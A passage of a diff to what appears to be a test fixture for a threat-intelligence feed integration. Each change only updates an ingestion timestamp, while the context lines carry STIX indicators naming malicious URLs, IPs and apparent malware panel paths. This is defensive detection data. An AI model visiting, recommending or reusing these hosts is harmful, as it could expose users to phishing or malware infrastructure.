http://smineolo39wings.in/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smineolo39wings.in/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:17.271Z\"}", "category": "threat", "type": "indicator", @@ -18897,7 +18897,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024847200Z", + "ingested": "2021-12-14T14:57:43.118327929Z", "original": "{\"created\":\"2020-02-08T14:02:23Z\",\"description\":\"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-08T14:02:23Z\",\"name\":\"mal_url: http://go.trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://go.trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23Z\"}", "category": "threat", "type": "indicator", @@ -18948,7 +18948,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024875400Z", + "ingested": "2021-12-14T14:57:43.118328427Z", "original": "{\"created\":\"2020-02-08T14:02:23.507Z\",\"description\":\"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-08T14:02:23.507Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.507Z\"}", "category": "threat", "type": "indicator", @@ -18993,7 +18993,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024879900Z", + "ingested": "2021-12-14T14:57:43.118328939Z", "original": "{\"created\":\"2020-02-08T14:02:23.547Z\",\"description\":\"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:02:23.547Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.547Z\"}", "category": "threat", "type": "indicator", @@ -19044,7 +19044,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024883400Z", + "ingested": "2021-12-14T14:57:43.118329400Z", "original": "{\"created\":\"2020-02-08T14:02:33.679Z\",\"description\":\"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-08T14:02:33.679Z\",\"name\":\"mal_url: http://f0391897.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391897.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:33.679Z\"}", "category": "threat", "type": "indicator", @@ -19089,7 +19089,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024888700Z", + "ingested": "2021-12-14T14:57:43.118329857Z", "original": "{\"created\":\"2020-02-08T14:02:53.996Z\",\"description\":\"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-08T14:02:53.996Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:53.996Z\"}", "category": "threat", "type": "indicator", @@ -19140,7 +19140,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024894900Z", + "ingested": "2021-12-14T14:57:43.118330334Z", "original": "{\"created\":\"2020-02-08T14:02:57.507Z\",\"description\":\"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--46c21251-c655-40c1-896d-2f4712091b7b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-08T14:02:57.507Z\",\"name\":\"mal_url: http://nikitakoteqka1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nikitakoteqka1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:57.507Z\"}", "category": "threat", "type": "indicator", @@ -19192,7 +19192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024919200Z", + "ingested": "2021-12-14T14:57:43.118330720Z", "original": "{\"created\":\"2020-02-08T14:02:59.236Z\",\"description\":\"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--7921e9e8-393c-4b0d-888f-bea034112f06\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:02:59.236Z\",\"name\":\"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.236Z\"}", "category": "threat", "type": "indicator", @@ -19243,7 +19243,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024949900Z", + "ingested": "2021-12-14T14:57:43.118331208Z", "original": "{\"created\":\"2020-02-08T14:02:59.246Z\",\"description\":\"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:02:59.246Z\",\"name\":\"mal_url: http://100stuff.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://100stuff.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.246Z\"}", "category": "threat", "type": "indicator", @@ -19288,7 +19288,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024954500Z", + "ingested": "2021-12-14T14:57:43.118331604Z", "original": "{\"created\":\"2020-02-08T14:02:59.31Z\",\"description\":\"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:02:59.31Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.31Z\"}", "category": "threat", "type": "indicator", @@ -19333,7 +19333,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024960200Z", + "ingested": "2021-12-14T14:57:43.118331999Z", "original": "{\"created\":\"2020-02-08T14:02:59.432Z\",\"description\":\"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-08T14:02:59.432Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.432Z\"}", "category": "threat", "type": "indicator", @@ -19385,7 +19385,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024968Z", + "ingested": "2021-12-14T14:57:43.118332388Z", "original": "{\"created\":\"2020-02-08T14:03:17.953Z\",\"description\":\"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-08T14:03:17.953Z\",\"name\":\"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:17.953Z\"}", "category": "threat", "type": "indicator", @@ -19437,7 +19437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024991900Z", + "ingested": "2021-12-14T14:57:43.118332789Z", "original": "{\"created\":\"2020-02-08T14:03:21.626Z\",\"description\":\"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:03:21.626Z\",\"name\":\"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:21.626Z\"}", "category": "threat", "type": "indicator", @@ -19488,7 +19488,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024996400Z", + "ingested": "2021-12-14T14:57:43.118333289Z", "original": "{\"created\":\"2020-02-08T14:03:23.941Z\",\"description\":\"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime\",\"id\":\"indicator--be5fb697-b554-4042-8185-f4148a5d02a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-08T14:03:23.941Z\",\"name\":\"mal_url: http://boomcoins.ml/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://boomcoins.ml/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:23.941Z\"}", "category": "threat", "type": "indicator", @@ -19539,7 +19539,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025001600Z", + "ingested": "2021-12-14T14:57:43.118333787Z", "original": "{\"created\":\"2020-02-08T14:03:34.136Z\",\"description\":\"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:03:34.136Z\",\"name\":\"mal_url: http://asstubevideos.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://asstubevideos.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.136Z\"}", "category": "threat", "type": "indicator", @@ -19590,7 +19590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025025700Z", + "ingested": "2021-12-14T14:57:43.118334222Z", "original": "{\"created\":\"2020-02-08T14:03:34.507Z\",\"description\":\"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-08T14:03:34.507Z\",\"name\":\"mal_url: http://f0397413.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0397413.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.507Z\"}", "category": "threat", "type": "indicator", @@ -19635,7 +19635,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025032100Z", + "ingested": "2021-12-14T14:57:43.118334614Z", "original": "{\"created\":\"2020-02-08T14:03:42.075Z\",\"description\":\"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:42.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.075Z\"}", "category": "threat", "type": "indicator", @@ -19686,7 +19686,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025036400Z", + "ingested": "2021-12-14T14:57:43.118335140Z", "original": "{\"created\":\"2020-02-08T14:03:42.298Z\",\"description\":\"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-08T14:03:42.298Z\",\"name\":\"mal_url: http://f0396512.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396512.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.298Z\"}", "category": "threat", "type": "indicator", @@ -19737,7 +19737,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025042Z", + "ingested": "2021-12-14T14:57:43.118335731Z", "original": "{\"created\":\"2020-02-08T14:03:46.901Z\",\"description\":\"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-08T14:03:46.901Z\",\"name\":\"mal_url: http://j1043204.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1043204.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:46.901Z\"}", "category": "threat", "type": "indicator", @@ -19788,7 +19788,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025049400Z", + "ingested": "2021-12-14T14:57:43.118336220Z", "original": "{\"created\":\"2020-02-08T14:03:47.108Z\",\"description\":\"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-08T14:03:47.108Z\",\"name\":\"mal_url: http://f0387320.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387320.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:47.108Z\"}", "category": "threat", "type": "indicator", @@ -19840,7 +19840,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025054100Z", + "ingested": "2021-12-14T14:57:43.118336730Z", "original": "{\"created\":\"2020-02-08T14:03:50.674Z\",\"description\":\"TS ID: 55298072749; iType: mal_url; State: active; Org: SpaceWeb CJSC; Source: CyberCrime\",\"id\":\"indicator--48ad83a8-cec1-4d85-a9fd-1b7f9308cb6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:50.674Z\",\"name\":\"mal_url: http://rqx10504bc.temp.swtest.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rqx10504bc.temp.swtest.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:50.674Z\"}", "category": "threat", "type": "indicator", @@ -19892,7 +19892,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025058900Z", + "ingested": "2021-12-14T14:57:43.118337212Z", "original": "{\"created\":\"2020-02-08T14:03:53.621Z\",\"description\":\"TS ID: 55298069555; iType: mal_url; State: active; Org: OOO Network of data-centers Selectel; Source: CyberCrime\",\"id\":\"indicator--8e98212b-20f2-404f-804b-8ab7519c5683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:53.621Z\",\"name\":\"mal_url: http://j6g3fzp.5k5.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j6g3fzp.5k5.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:53.621Z\"}", "category": "threat", "type": "indicator", @@ -19943,7 +19943,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025062500Z", + "ingested": "2021-12-14T14:57:43.118337594Z", "original": "{\"created\":\"2020-02-08T14:03:58.176Z\",\"description\":\"TS ID: 55298069681; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--395e83ba-96c1-45d2-b4b2-c065af5547fe\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:58.176Z\",\"name\":\"mal_url: http://stableupdater.ru.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stableupdater.ru.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.176Z\"}", "category": "threat", "type": "indicator", @@ -19995,7 +19995,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025067500Z", + "ingested": "2021-12-14T14:57:43.118337973Z", "original": "{\"created\":\"2020-02-08T14:03:58.41Z\",\"description\":\"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime\",\"id\":\"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-02-08T14:03:58.41Z\",\"name\":\"mal_url: http://209.182.217.85/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.182.217.85/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.41Z\"}", "category": "threat", "type": "indicator", @@ -20047,7 +20047,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025074900Z", + "ingested": "2021-12-14T14:57:43.118338525Z", "original": "{\"created\":\"2020-02-08T14:04:30.627Z\",\"description\":\"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.627Z\",\"name\":\"mal_url: http://fentq.org/x/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fentq.org/x/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.627Z\"}", "category": "threat", "type": "indicator", @@ -20099,7 +20099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025082200Z", + "ingested": "2021-12-14T14:57:43.118338975Z", "original": "{\"created\":\"2020-02-08T14:04:30.659Z\",\"description\":\"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-08T14:04:30.659Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.659Z\"}", "category": "threat", "type": "indicator", @@ -20144,7 +20144,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025089500Z", + "ingested": "2021-12-14T14:57:43.118339447Z", "original": "{\"created\":\"2020-02-08T14:04:30.733Z\",\"description\":\"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--7873494f-24fb-42a6-ae17-299b9825e220\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:04:30.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.733Z\"}", "category": "threat", "type": "indicator", @@ -20196,7 +20196,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025096700Z", + "ingested": "2021-12-14T14:57:43.118339898Z", "original": "{\"created\":\"2020-02-08T14:04:30.81Z\",\"description\":\"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-08T14:04:30.81Z\",\"name\":\"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.81Z\"}", "category": "threat", "type": "indicator", @@ -20248,7 +20248,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025103900Z", + "ingested": "2021-12-14T14:57:43.118340364Z", "original": "{\"created\":\"2020-02-08T14:04:30.84Z\",\"description\":\"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.84Z\",\"name\":\"mal_url: http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.84Z\"}", "category": "threat", "type": "indicator", @@ -20299,7 +20299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025111Z", + "ingested": "2021-12-14T14:57:43.118341010Z", "original": "{\"created\":\"2020-02-08T14:04:30.927Z\",\"description\":\"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:04:30.927Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.927Z\"}", "category": "threat", "type": "indicator", @@ -20350,7 +20350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025118600Z", + "ingested": "2021-12-14T14:57:43.118341435Z", "original": "{\"created\":\"2020-02-08T14:04:35.541Z\",\"description\":\"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:04:35.541Z\",\"name\":\"mal_url: http://trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.541Z\"}", "category": "threat", "type": "indicator", @@ -20395,7 +20395,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025125700Z", + "ingested": "2021-12-14T14:57:43.118341983Z", "original": "{\"created\":\"2020-02-08T14:04:35.641Z\",\"description\":\"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-08T14:04:35.641Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.641Z\"}", "category": "threat", "type": "indicator", @@ -20446,7 +20446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025133Z", + "ingested": "2021-12-14T14:57:43.118342438Z", "original": "{\"created\":\"2020-02-08T14:04:37.657Z\",\"description\":\"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d2987902-59e6-4667-b011-f20e93e283d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:04:37.657Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:37.657Z\"}", "category": "threat", "type": "indicator", @@ -20498,7 +20498,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025140200Z", + "ingested": "2021-12-14T14:57:43.118342928Z", "original": "{\"created\":\"2020-02-08T14:04:41.785Z\",\"description\":\"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-08T14:04:41.785Z\",\"name\":\"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 